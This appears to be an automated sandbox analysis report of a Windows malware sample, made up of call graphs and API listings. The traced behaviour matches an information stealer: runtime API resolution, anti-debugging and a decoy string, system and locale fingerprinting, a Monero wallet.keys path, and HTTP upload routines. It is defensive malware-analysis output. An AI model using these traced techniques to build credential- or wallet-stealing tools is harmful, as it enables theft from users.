API calls 14476->14477 14478 a54112 14477->14478 14479 a545c0 2 API calls 14478->14479 14480 a5412b 14479->14480 14481 a545c0 2 API calls 14480->14481 14482 a54144 14481->14482 14483 a545c0 2 API calls 14482->14483 14484 a5415d 14483->14484 14485 a545c0 2 API calls 14484->14485 14486 a54176 14485->14486 14487 a545c0 2 API calls 14486->14487 14488 a5418f 14487->14488 14489 a545c0 2 API calls 14488->14489 14490 a541a8 14489->14490 14491 a545c0 2 API calls 14490->14491 14492 a541c1 14491->14492 14493 a545c0 2 API calls 14492->14493 14494 a541da 14493->14494 14495 a545c0 2 API calls 
14494->14495 14496 a541f3 14495->14496 14497 a545c0 2 API calls 14496->14497 14498 a5420c 14497->14498 14499 a545c0 2 API calls 14498->14499 14500 a54225 14499->14500 14501 a545c0 2 API calls 14500->14501 14502 a5423e 14501->14502 14503 a545c0 2 API calls 14502->14503 14504 a54257 14503->14504 14505 a545c0 2 API calls 14504->14505 14506 a54270 14505->14506 14507 a545c0 2 API calls 14506->14507 14508 a54289 14507->14508 14509 a545c0 2 API calls 14508->14509 14510 a542a2 14509->14510 14511 a545c0 2 API calls 14510->14511 14512 a542bb 14511->14512 14513 a545c0 2 API calls 14512->14513 14514 a542d4 14513->14514 14515 a545c0 2 API calls 14514->14515 14516 a542ed 14515->14516 14517 a545c0 2 API calls 14516->14517 14518 a54306 14517->14518 14519 a545c0 2 API calls 14518->14519 14520 a5431f 14519->14520 14521 a545c0 2 API calls 14520->14521 14522 a54338 14521->14522 14523 a545c0 2 API calls 14522->14523 14524 a54351 14523->14524 14525 a545c0 2 API calls 14524->14525 14526 a5436a 14525->14526 14527 a545c0 2 API calls 14526->14527 14528 a54383 14527->14528 14529 a545c0 2 API calls 14528->14529 14530 a5439c 14529->14530 14531 a545c0 2 API calls 14530->14531 14532 a543b5 14531->14532 14533 a545c0 2 API calls 14532->14533 14534 a543ce 14533->14534 14535 a545c0 2 API calls 14534->14535 14536 a543e7 14535->14536 14537 a545c0 2 API calls 14536->14537 14538 a54400 14537->14538 14539 a545c0 2 API calls 14538->14539 14540 a54419 14539->14540 14541 a545c0 2 API calls 14540->14541 14542 a54432 14541->14542 14543 a545c0 2 API calls 14542->14543 14544 a5444b 14543->14544 14545 a545c0 2 API calls 14544->14545 14546 a54464 14545->14546 14547 a545c0 2 API calls 14546->14547 14548 a5447d 14547->14548 14549 a545c0 2 API calls 14548->14549 14550 a54496 14549->14550 14551 a545c0 2 API calls 14550->14551 14552 a544af 14551->14552 14553 a545c0 2 API calls 14552->14553 14554 a544c8 14553->14554 14555 a545c0 2 API calls 14554->14555 14556 a544e1 14555->14556 14557 a545c0 2 API calls 14556->14557 
14558 a544fa 14557->14558 14559 a545c0 2 API calls 14558->14559 14560 a54513 14559->14560 14561 a545c0 2 API calls 14560->14561 14562 a5452c 14561->14562 14563 a545c0 2 API calls 14562->14563 14564 a54545 14563->14564 14565 a545c0 2 API calls 14564->14565 14566 a5455e 14565->14566 14567 a545c0 2 API calls 14566->14567 14568 a54577 14567->14568 14569 a545c0 2 API calls 14568->14569 14570 a54590 14569->14570 14571 a545c0 2 API calls 14570->14571 14572 a545a9 14571->14572 14573 a69c10 14572->14573 14574 a6a036 8 API calls 14573->14574 14575 a69c20 43 API calls 14573->14575 14576 a6a146 14574->14576 14577 a6a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14574->14577 14575->14574 14578 a6a216 14576->14578 14579 a6a153 8 API calls 14576->14579 14577->14576 14580 a6a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14578->14580 14581 a6a298 14578->14581 14579->14578 14580->14581 14582 a6a337 14581->14582 14583 a6a2a5 6 API calls 14581->14583 14584 a6a344 9 API calls 14582->14584 14585 a6a41f 14582->14585 14583->14582 14584->14585 14586 a6a4a2 14585->14586 14587 a6a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14585->14587 14588 a6a4dc 14586->14588 14589 a6a4ab GetProcAddress GetProcAddress 14586->14589 14587->14586 14590 a6a515 14588->14590 14591 a6a4e5 GetProcAddress GetProcAddress 14588->14591 14589->14588 14592 a6a612 14590->14592 14593 a6a522 10 API calls 14590->14593 14591->14590 14594 a6a67d 14592->14594 14595 a6a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14595 14593->14592 14596 a6a686 GetProcAddress 14594->14596 14597 a6a69e 14594->14597 14595->14594 14596->14597 14598 a6a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14597->14598 14599 a65ca3 14597->14599 14598->14599 14600 a51590 14599->14600 15719 a51670 14600->15719 14603 a6a7a0 lstrcpy 14604 a515b5 14603->14604 14605 a6a7a0 lstrcpy 14604->14605 14606 a515c7 14605->14606 
14607 a6a7a0 lstrcpy 14606->14607 14608 a515d9 14607->14608 14609 a6a7a0 lstrcpy 14608->14609 14610 a51663 14609->14610 14611 a65510 14610->14611 14612 a65521 14611->14612 14613 a6a820 2 API calls 14612->14613 14614 a6552e 14613->14614 14615 a6a820 2 API calls 14614->14615 14616 a6553b 14615->14616 14617 a6a820 2 API calls 14616->14617 14618 a65548 14617->14618 14619 a6a740 lstrcpy 14618->14619 14620 a65555 14619->14620 14621 a6a740 lstrcpy 14620->14621 14622 a65562 14621->14622 14623 a6a740 lstrcpy 14622->14623 14624 a6556f 14623->14624 14625 a6a740 lstrcpy 14624->14625 14638 a6557c 14625->14638 14626 a6a820 lstrlen lstrcpy 14626->14638 14627 a65643 StrCmpCA 14627->14638 14628 a656a0 StrCmpCA 14630 a657dc 14628->14630 14628->14638 14629 a6a7a0 lstrcpy 14629->14638 14631 a6a8a0 lstrcpy 14630->14631 14632 a657e8 14631->14632 14633 a6a820 2 API calls 14632->14633 14636 a657f6 14633->14636 14634 a6a740 lstrcpy 14634->14638 14635 a651f0 20 API calls 14635->14638 14639 a6a820 2 API calls 14636->14639 14637 a65856 StrCmpCA 14637->14638 14640 a65991 14637->14640 14638->14626 14638->14627 14638->14628 14638->14629 14638->14634 14638->14635 14638->14637 14641 a6a8a0 lstrcpy 14638->14641 14647 a652c0 25 API calls 14638->14647 14649 a65a0b StrCmpCA 14638->14649 14661 a6578a StrCmpCA 14638->14661 14663 a51590 lstrcpy 14638->14663 14664 a6593f StrCmpCA 14638->14664 14643 a65805 14639->14643 14642 a6a8a0 lstrcpy 14640->14642 14641->14638 14644 a6599d 14642->14644 14645 a51670 lstrcpy 14643->14645 14646 a6a820 2 API calls 14644->14646 14665 a65811 14645->14665 14648 a659ab 14646->14648 14647->14638 14652 a6a820 2 API calls 14648->14652 14650 a65a16 Sleep 14649->14650 14651 a65a28 14649->14651 14650->14638 14653 a6a8a0 lstrcpy 14651->14653 14654 a659ba 14652->14654 14655 a65a34 14653->14655 14656 a51670 lstrcpy 14654->14656 14657 a6a820 2 API calls 14655->14657 14656->14665 14658 a65a43 14657->14658 14659 a6a820 2 API calls 14658->14659 14660 a65a52 14659->14660 14662 a51670 
[Control-flow graph edge list (node/edge serialisation of the rendered graph image) omitted. API call chains recoverable from it, keyed by the address of the function or basic block that issues them:
• a547b0: lstrlen, InternetCrackUrlA (a54848)
• a54899 routine: InternetOpenA + StrCmpCA (a5490b), InternetConnectA (a54aa3), HttpOpenRequestA (a54ad3), lstrlen, HttpSendRequestA (a54e13), InternetReadFile loop (a54e32), InternetCloseHandle (a54e67, a54ebe, a54ecb); response handed to a59ac0
• a55979 routine, same WinINet sequence: InternetOpenA + StrCmpCA (a559ee), InternetConnectA (a55b7c), HttpOpenRequestA (a55bac), lstrlen + GetProcessHeap + RtlAllocateHeap (a55e81), HttpSendRequestA (a55f2a), InternetReadFile loop (a55f35), InternetCloseHandle (a55f6a, a55fb6, a55fc3)
• a55100 routine (reached via a65190): CryptBinaryToStringA helper a68ea0 (CryptBinaryToStringA, GetProcessHeap, RtlAllocateHeap, CryptBinaryToStringA), then InternetOpenA + StrCmpCA (a551fd), InternetConnectA (a55329), HttpOpenRequestA (a55359), InternetCloseHandle (a558b7, a558c4)
• a55009: InternetOpenUrlA, InternetReadFile loop (a5502a), InternetCloseHandle x 2 (a550a0)
• a59ac0: CryptStringToBinaryA, LocalAlloc (a59af9), CryptStringToBinaryA (a59b14), LocalFree (a59b39)
• a617c4: StrCmpCA, then ExitProcess (a617cf) on one branch; otherwise a chain of StrCmpCA checks at a6185d, a6187f, a618ad, a618cf, a618f1, a61913, a61932, a61951, a61970 with lstrlen/lstrcpy between them
• a60db7, a60f67, a60799..a6099c: further StrCmpCA checks with lstrlen/lstrcpy
• a67500 (6 API calls): GetVolumeInformationA (a67553), GetProcessHeap + RtlAllocateHeap (a675fc), wsprintfA (a67628)
• a67690 / a677a0 / a67e00: GetProcessHeap, RtlAllocateHeap, RegOpenKeyExA, RegQueryValueExA, RegCloseKey
• a677c0: GetCurrentProcess, IsWow64Process; a67850 and a678e0: 3 API calls each (not named in the graph)
• a67980: GetProcessHeap, RtlAllocateHeap, GetLocalTime, wsprintfA; a67a30: GetProcessHeap, RtlAllocateHeap, GetTimeZoneInformation, wsprintfA (a67a9a)
• a67b00: GetUserDefaultLocaleName, then a68d20: LocalAlloc, CharToOemW; a67b90: GetKeyboardLayoutList, LocalAlloc, GetKeyboardLayoutList (a67bcc), GetLocaleInfoA loop (a67c46), LocalFree (a67d1e); a67d80: GetSystemPowerStatus
• a6207e: GetCurrentProcessId, then a69470: OpenProcess, GetModuleFileNameExA + CloseHandle (a69493)
• a67f60: GetLogicalProcessorInformationEx (a67fb9), GetLastError (a67fd8), wsprintfA (a68084); a67ed0: GetSystemInfo, wsprintfA; a68100: GetProcessHeap, RtlAllocateHeap, GlobalMemoryStatusEx (a6814d), __aulldiv, wsprintfA (a6819b); a687c0: GetProcessHeap, RtlAllocateHeap, wsprintfA (a687fb)
• a68320 (17 API calls): RegOpenKeyExA (a6835c), RegEnumKeyExA loop (a683f8), wsprintfA + RegOpenKeyExA (a6843f), RegQueryValueExA (a684c1, a6856e), lstrlen, RegCloseKey (a68485, a68601, a68613)
• a68680: CreateToolhelp32Snapshot + Process32First (a686bc), Process32Next loop (a686e8), CloseHandle (a6875d)
• a56d40 region (via a598d0 / a56fb0): a56530: VirtualAlloc (a5668f, a56743); a569b0: LoadLibraryA (a56a09), GetProcAddress loop (a56ba8); then VirtualFree (a56ee6), FreeLibrary (a56f26)
• a68b60: GetSystemTime (a68b82); a68a10: GetProcessHeap, RtlAllocateHeap; a689f0: GetProcessHeap, HeapFree (a689f9)
• string helpers called throughout: a6a740, a6a7a0, a6a8a0, a51590 (lstrcpy); a6a920 (lstrcpy, lstrcat); a6a9b0 (lstrcpy, lstrlen, lstrcpy, lstrcat); a6a820 (lstrlen, lstrcpy)]

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              [Graph data for the function at a69860 omitted. Basic blocks in address order: a69860-a69874 (call a69750); a6987a-a69a8e (call a69780, GetProcAddress x 21); a69a93-a69af2 (LoadLibraryA x 5); a69af4-a69b08 (GetProcAddress); a69b0d-a69b14; a69b16-a69b41 (GetProcAddress x 2); a69b46-a69b4d; a69b4f-a69b63 (GetProcAddress); a69b68-a69b6f; a69b71-a69b84 (GetProcAddress); a69b89-a69b90; a69b92-a69bbc (GetProcAddress x 2); a69bc1-a69bc2. The entry block branches either to a6987a (the 21 GetProcAddress calls) or directly to a69a93 (LoadLibraryA x 5); each later GetProcAddress block is conditional and falls through to the next check block.]
                              APIs
                              • GetProcAddress.KERNEL32(77190000,014416A8), ref: 00A698A1
                              • GetProcAddress.KERNEL32(77190000,014414F8), ref: 00A698BA
                              • GetProcAddress.KERNEL32(77190000,01441678), ref: 00A698D2
                              • GetProcAddress.KERNEL32(77190000,014416C0), ref: 00A698EA
                              • GetProcAddress.KERNEL32(77190000,01441570), ref: 00A69903
                              • GetProcAddress.KERNEL32(77190000,01448B18), ref: 00A6991B
                              • GetProcAddress.KERNEL32(77190000,01435448), ref: 00A69933
                              • GetProcAddress.KERNEL32(77190000,014356C8), ref: 00A6994C
                              • GetProcAddress.KERNEL32(77190000,01441558), ref: 00A69964
                              • GetProcAddress.KERNEL32(77190000,01441708), ref: 00A6997C
                              • GetProcAddress.KERNEL32(77190000,01441720), ref: 00A69995
                              • GetProcAddress.KERNEL32(77190000,01441528), ref: 00A699AD
                              • GetProcAddress.KERNEL32(77190000,014355A8), ref: 00A699C5
                              • GetProcAddress.KERNEL32(77190000,01441750), ref: 00A699DE
                              • GetProcAddress.KERNEL32(77190000,01441768), ref: 00A699F6
                              • GetProcAddress.KERNEL32(77190000,014356A8), ref: 00A69A0E
                              • GetProcAddress.KERNEL32(77190000,01441540), ref: 00A69A27
                              • GetProcAddress.KERNEL32(77190000,01441618), ref: 00A69A3F
                              • GetProcAddress.KERNEL32(77190000,014356E8), ref: 00A69A57
                              • GetProcAddress.KERNEL32(77190000,014418A0), ref: 00A69A70
                              • GetProcAddress.KERNEL32(77190000,014355C8), ref: 00A69A88
                              • LoadLibraryA.KERNEL32(01441858,?,00A66A00), ref: 00A69A9A
                              • LoadLibraryA.KERNEL32(01441828,?,00A66A00), ref: 00A69AAB
                              • LoadLibraryA.KERNEL32(01441870,?,00A66A00), ref: 00A69ABD
                              • LoadLibraryA.KERNEL32(014418B8,?,00A66A00), ref: 00A69ACF
                              • LoadLibraryA.KERNEL32(014417F8,?,00A66A00), ref: 00A69AE0
                              • GetProcAddress.KERNEL32(76850000,01441810), ref: 00A69B02
                              • GetProcAddress.KERNEL32(77040000,01441840), ref: 00A69B23
                              • GetProcAddress.KERNEL32(77040000,01441888), ref: 00A69B3B
                              • GetProcAddress.KERNEL32(75A10000,01448CF0), ref: 00A69B5D
                              • GetProcAddress.KERNEL32(75690000,01435608), ref: 00A69B7E
                              • GetProcAddress.KERNEL32(776F0000,01448AE8), ref: 00A69B9F
                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A69BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00A69BAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: f28e8df5523de4609e0ec18d736c5f061de7f3f6a549a88d5ae51dcbd03054ee
                              • Instruction ID: 8d93aba6fb191bce663b45a2bc33b80cf9693f7b294ad783b500221b96b58fc9
                              • Opcode Fuzzy Hash: f28e8df5523de4609e0ec18d736c5f061de7f3f6a549a88d5ae51dcbd03054ee
                              • Instruction Fuzzy Hash: AEA118B5510240AFD344EFA9ED8DB6E3BF9F78C301714851BA609832B4D639A842DBD6

                               Control-flow Graph
                               (graph image not reproduced; basic blocks a545c0-a547a9: RtlAllocateHeap is called in block a545c0-a54695, VirtualProtect in block a5474f-a547a9)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A5460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00A5479C
                              Strings
                               • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (same string referenced 30 times), xrefs: 00A545C7, 00A545D2, 00A545DD, 00A545E8, 00A545F3, 00A54617, 00A54622, 00A5462D, 00A54638, 00A54643, 00A54657, 00A54662, 00A5466D, 00A54678, 00A54683, 00A546AC, 00A546B7, 00A546C2, 00A546CD, 00A546D8, 00A54713, 00A5471E, 00A54729, 00A54734, 00A5473F, 00A5474F, 00A5475A, 00A54765, 00A54770, 00A5477B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                               • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref above, joined with $)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 168abaa1972221527f8c8f75a4a5d4720c81a4f7b42a4bf7189d6392a0145aee
                              • Instruction ID: 412afa3ee63813ee8bae675fc3dbf18075b7de519d7086871b2022a79ffa0d09
                              • Opcode Fuzzy Hash: 168abaa1972221527f8c8f75a4a5d4720c81a4f7b42a4bf7189d6392a0145aee
                              • Instruction Fuzzy Hash: 6341D360BCB6087A962CB7B58C6DADFB652FF46F01F90D85DE80C57280E6F06A00C531

                               Control-flow Graph
                               (graph image not reproduced; basic blocks a54880-a54fa2: InternetOpenA and StrCmpCA in block a54880-a54942, InternetConnectA in a54955-a54acd, HttpOpenRequestA in a54aef-a54b22, lstrlen and HttpSendRequestA in a54b28-a54e28, InternetReadFile in a54e32-a54e5c, InternetCloseHandle in a54e67-a54eb9, a54ebe-a54ec5 and a54ecb-a54ef3)
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A54839
                                • Part of subcall function 00A547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A54849
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A54915
                              • StrCmpCA.SHLWAPI(?,0144F340), ref: 00A5493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A54ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A70DDB,00000000,?,?,00000000,?,",00000000,?,0144F270), ref: 00A54DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A54E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A54E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00A54E49
                              • InternetCloseHandle.WININET(00000000), ref: 00A54EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00A54EC5
                              • HttpOpenRequestA.WININET(00000000,0144F290,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A54B15
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00A54ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f5b68c03debb481d5be730d294b0424dca4ebf08b879e21f91a368094461a4b8
                              • Instruction ID: 78434c52909be07ec299340cab8ad631b159050bb4e0edc5facaaa0910e8bdbb
                              • Opcode Fuzzy Hash: f5b68c03debb481d5be730d294b0424dca4ebf08b879e21f91a368094461a4b8
                              • Instruction Fuzzy Hash: F812CB72910118AADB15EB90DEA6FEEB378BF24300F504599B51673091EF702F49CFA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A67910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00A6792F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 9acf648cab630b8b4160d911db5801d73e37c26fc8b4f35d8dfc913a630b578c
                              • Instruction ID: 484970bb32e35e5743fa49c59e0d104982b6dffa8ff206ea57d41a19bfda8681
                              • Opcode Fuzzy Hash: 9acf648cab630b8b4160d911db5801d73e37c26fc8b4f35d8dfc913a630b578c
                              • Instruction Fuzzy Hash: 320181B2A14208EBD740DF99DD49FAEBBF8FB04B25F10425AFA55E32C0C37459008BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A511B7), ref: 00A67880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A67887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A6789F
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 0365402ecbb29c75c9c7ffb71d172136688914a351713eff9e966d6fd1b88036
                              • Instruction ID: 52d3a81daa05aa6d9067b4045b0bed67bebed8b2041c1e2109ff49b31c272840
                              • Opcode Fuzzy Hash: 0365402ecbb29c75c9c7ffb71d172136688914a351713eff9e966d6fd1b88036
                              • Instruction Fuzzy Hash: 17F04FB1D44208ABC700DF99DD4ABAEBBB8FB04711F10065AFA05A3680C77459048BE1
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                               • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 536a229e63b283b85a68a01c5305c2e78693127ca523821ae011cbc162757d60
                              • Instruction ID: 970d59913aff7d2a0336b5732e3bf9fb5818aa5c7c32b67e560c1cfeaf74ed48
                              • Opcode Fuzzy Hash: 536a229e63b283b85a68a01c5305c2e78693127ca523821ae011cbc162757d60
                              • Instruction Fuzzy Hash: 0FD09E7490430CEBCB04DFE1D94E7EDBB78FB0C716F101699DD0562340EA315995CAA6

                               Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                               • Function 00A69C10-00A6A709, dynamic import resolution. Entry block 00A69C10-00A69C1A; then 43 GetProcAddress calls in 00A69C20-00A6A031 (all against module handle 77190000), 8 LoadLibraryA calls in 00A6A036-00A6A0CA, and twelve further GetProcAddress batches, each against a single module handle, of 5 (00A6A0CC-00A6A141), 8 (00A6A153-00A6A211), 5 (00A6A21F-00A6A293), 6 (00A6A2A5-00A6A332), 9 (00A6A344-00A6A41A), 5 (00A6A428-00A6A49D), 2 (00A6A4AB-00A6A4D7), 2 (00A6A4E5-00A6A510), 10 (00A6A522-00A6A60D), 4 (00A6A61B-00A6A678), 1 (00A6A686-00A6A699) and 4 (00A6A6A7-00A6A703) calls, 104 GetProcAddress calls in total. Every batch, including the first one, is entered from a short two-exit block (for example 00A6A146-00A6A14D) whose other exit skips the batch; all paths end at 00A6A708-00A6A709.
                              APIs
                              • GetProcAddress.KERNEL32(77190000,01435648), ref: 00A69C2D
                              • GetProcAddress.KERNEL32(77190000,01435668), ref: 00A69C45
                              • GetProcAddress.KERNEL32(77190000,01448FF0), ref: 00A69C5E
                              • GetProcAddress.KERNEL32(77190000,01449038), ref: 00A69C76
                              • GetProcAddress.KERNEL32(77190000,01449068), ref: 00A69C8E
                              • GetProcAddress.KERNEL32(77190000,0144D050), ref: 00A69CA7
                              • GetProcAddress.KERNEL32(77190000,0143A690), ref: 00A69CBF
                              • GetProcAddress.KERNEL32(77190000,0144D218), ref: 00A69CD7
                              • GetProcAddress.KERNEL32(77190000,0144D0C8), ref: 00A69CF0
                              • GetProcAddress.KERNEL32(77190000,0144D0B0), ref: 00A69D08
                              • GetProcAddress.KERNEL32(77190000,0144D2A8), ref: 00A69D20
                              • GetProcAddress.KERNEL32(77190000,01435688), ref: 00A69D39
                              • GetProcAddress.KERNEL32(77190000,01435548), ref: 00A69D51
                              • GetProcAddress.KERNEL32(77190000,014354C8), ref: 00A69D69
                              • GetProcAddress.KERNEL32(77190000,014353C8), ref: 00A69D82
                              • GetProcAddress.KERNEL32(77190000,0144D170), ref: 00A69D9A
                              • GetProcAddress.KERNEL32(77190000,0144D068), ref: 00A69DB2
                              • GetProcAddress.KERNEL32(77190000,0143A910), ref: 00A69DCB
                              • GetProcAddress.KERNEL32(77190000,01435728), ref: 00A69DE3
                              • GetProcAddress.KERNEL32(77190000,0144D278), ref: 00A69DFB
                              • GetProcAddress.KERNEL32(77190000,0144D2D8), ref: 00A69E14
                              • GetProcAddress.KERNEL32(77190000,0144D2F0), ref: 00A69E2C
                              • GetProcAddress.KERNEL32(77190000,0144D260), ref: 00A69E44
                              • GetProcAddress.KERNEL32(77190000,01435388), ref: 00A69E5D
                              • GetProcAddress.KERNEL32(77190000,0144D230), ref: 00A69E75
                              • GetProcAddress.KERNEL32(77190000,0144D158), ref: 00A69E8D
                              • GetProcAddress.KERNEL32(77190000,0144D1A0), ref: 00A69EA6
                              • GetProcAddress.KERNEL32(77190000,0144D080), ref: 00A69EBE
                              • GetProcAddress.KERNEL32(77190000,0144D290), ref: 00A69ED6
                              • GetProcAddress.KERNEL32(77190000,0144D0E0), ref: 00A69EEF
                              • GetProcAddress.KERNEL32(77190000,0144D128), ref: 00A69F07
                              • GetProcAddress.KERNEL32(77190000,0144D2C0), ref: 00A69F1F
                              • GetProcAddress.KERNEL32(77190000,0144D200), ref: 00A69F38
                              • GetProcAddress.KERNEL32(77190000,0143FE68), ref: 00A69F50
                              • GetProcAddress.KERNEL32(77190000,0144D188), ref: 00A69F68
                              • GetProcAddress.KERNEL32(77190000,0144D308), ref: 00A69F81
                              • GetProcAddress.KERNEL32(77190000,01435428), ref: 00A69F99
                              • GetProcAddress.KERNEL32(77190000,0144D248), ref: 00A69FB1
                              • GetProcAddress.KERNEL32(77190000,014354A8), ref: 00A69FCA
                              • GetProcAddress.KERNEL32(77190000,0144D0F8), ref: 00A69FE2
                              • GetProcAddress.KERNEL32(77190000,0144D110), ref: 00A69FFA
                              • GetProcAddress.KERNEL32(77190000,01435568), ref: 00A6A013
                              • GetProcAddress.KERNEL32(77190000,01435588), ref: 00A6A02B
                              • LoadLibraryA.KERNEL32(0144D140,?,00A65CA3,00A70AEB,?,?,?,?,?,?,?,?,?,?,00A70AEA,00A70AE3), ref: 00A6A03D
